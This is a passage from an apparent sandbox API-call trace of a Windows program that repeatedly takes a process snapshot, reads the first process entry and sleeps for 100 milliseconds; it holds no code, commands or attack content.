cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.744] Sleep (dwMilliseconds=0x64) [0277.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0277.768] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.865] Sleep (dwMilliseconds=0x64) [0277.870] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0277.885] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.978] Sleep (dwMilliseconds=0x64) [0277.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0278.000] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.122] Sleep (dwMilliseconds=0x64) [0278.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0278.148] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.269] Sleep (dwMilliseconds=0x64) [0278.272] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0278.289] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.406] Sleep (dwMilliseconds=0x64) [0278.412] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0278.424] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.510] Sleep (dwMilliseconds=0x64) [0278.517] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0278.543] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.638] Sleep (dwMilliseconds=0x64) [0278.646] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0278.666] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.759] Sleep (dwMilliseconds=0x64) [0278.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0278.779] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.847] Sleep (dwMilliseconds=0x64) [0278.853] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0278.866] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.964] Sleep (dwMilliseconds=0x64) [0278.968] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0278.984] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.095] Sleep (dwMilliseconds=0x64) [0279.099] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0279.119] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.255] Sleep (dwMilliseconds=0x64) [0279.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0279.285] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.383] Sleep (dwMilliseconds=0x64) [0279.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0279.406] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.505] Sleep (dwMilliseconds=0x64) [0279.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0279.538] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.694] Sleep (dwMilliseconds=0x64) [0279.699] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0279.714] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.786] Sleep (dwMilliseconds=0x64) [0279.791] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0279.805] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.882] Sleep (dwMilliseconds=0x64) [0279.887] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0279.900] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.973] Sleep (dwMilliseconds=0x64) [0279.976] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0279.995] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.090] Sleep (dwMilliseconds=0x64) [0280.098] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0280.113] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.233] Sleep (dwMilliseconds=0x64) [0280.241] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0280.256] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.331] Sleep (dwMilliseconds=0x64) [0280.333] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0280.345] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.421] Sleep (dwMilliseconds=0x64) [0280.428] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0280.441] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.531] Sleep (dwMilliseconds=0x64) [0280.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0280.554] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.642] Sleep (dwMilliseconds=0x64) [0280.651] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0280.663] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.745] Sleep (dwMilliseconds=0x64) [0280.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0280.776] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.855] Sleep (dwMilliseconds=0x64) [0280.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0280.873] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.957] Sleep (dwMilliseconds=0x64) [0280.960] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0280.975] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.081] Sleep (dwMilliseconds=0x64) [0281.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0281.110] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.229] Sleep (dwMilliseconds=0x64) [0281.232] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0281.250] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.345] Sleep (dwMilliseconds=0x64) [0281.350] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0281.372] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.456] Sleep (dwMilliseconds=0x64) [0281.458] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0281.472] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.581] Sleep (dwMilliseconds=0x64) [0281.583] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0281.599] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.701] Sleep (dwMilliseconds=0x64) [0281.707] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0281.727] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.822] Sleep (dwMilliseconds=0x64) [0281.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0281.845] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.926] Sleep (dwMilliseconds=0x64) [0281.966] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0281.978] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.058] Sleep (dwMilliseconds=0x64) [0282.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0282.077] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.167] Sleep (dwMilliseconds=0x64) [0282.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0282.181] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.272] Sleep (dwMilliseconds=0x64) [0282.276] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0282.293] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.367] Sleep (dwMilliseconds=0x64) [0282.372] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0282.386] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.453] Sleep (dwMilliseconds=0x64) [0282.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0282.469] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.547] Sleep (dwMilliseconds=0x64) [0282.569] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0282.582] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.655] Sleep (dwMilliseconds=0x64) [0282.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0282.672] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.748] Sleep (dwMilliseconds=0x64) [0282.751] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0282.764] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.838] Sleep (dwMilliseconds=0x64) [0282.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0282.856] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.927] Sleep (dwMilliseconds=0x64) [0282.934] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0282.946] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.029] Sleep (dwMilliseconds=0x64) [0283.034] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0283.060] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.306] Sleep (dwMilliseconds=0x64) [0283.310] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0283.327] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.416] Sleep (dwMilliseconds=0x64) [0283.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0283.438] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.550] Sleep (dwMilliseconds=0x64) [0283.569] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0283.585] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.673] Sleep (dwMilliseconds=0x64) [0283.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0283.703] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.781] Sleep (dwMilliseconds=0x64) [0283.786] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0283.798] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.869] Sleep (dwMilliseconds=0x64) [0283.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0283.885] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.959] Sleep (dwMilliseconds=0x64) [0283.966] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0283.983] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.091] Sleep (dwMilliseconds=0x64) [0284.094] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0284.110] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.223] Sleep (dwMilliseconds=0x64) [0284.227] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0284.244] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.393] Sleep (dwMilliseconds=0x64) [0284.396] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0284.409] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.484] Sleep (dwMilliseconds=0x64) [0284.487] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0284.500] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.579] Sleep (dwMilliseconds=0x64) [0284.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0284.606] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.700] Sleep (dwMilliseconds=0x64) [0284.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2320 [0284.724] Process32First (in: hSnapshot=0x2320, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, 